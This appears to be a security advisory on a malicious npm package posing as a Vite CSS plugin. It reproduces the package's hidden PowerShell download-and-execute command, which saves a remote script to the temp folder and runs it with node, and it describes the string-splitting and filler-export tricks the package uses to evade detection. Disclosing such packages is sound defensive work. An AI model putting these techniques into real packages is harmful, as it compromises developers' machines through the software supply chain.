vite-plugin-css-blendnpm

The package is published as a Vite CSS plugin but exposes no Vite plugin API. Its documented applyGlobalStyles({palette, accents}) export, when called on Windows, treats the caller-supplied accents and palette strings as an AES-256-CBC IV and ciphertext, decrypts them with a hardcoded key, and spawns powershell.exe -WindowStyle Hidden -NoProfile -Command "irm <decrypted-url> -o $env:TEMP\s.js; node $env:TEMP\s.js" — fetching and executing an attacker-controlled JavaScript payload via Node. The node:crypto and node:child_process modules are imported via string-array join (["no","de",":","cry","pto"].join(""), ["no","de",":","chi","ld","_pro","cess"].join("")) to evade static import detection. The package further ships ~200 numbered no-op exports (e.g., isWithinBoundary1..200, applyPreset1..150, createSequenceStep1..250) as filler to camouflage the malicious export among legitimate-looking utilities, and its name baits developers searching the Vite ecosystem. Any consumer following the documented API on a Windows host triggers download-and-execute of arbitrary remote code.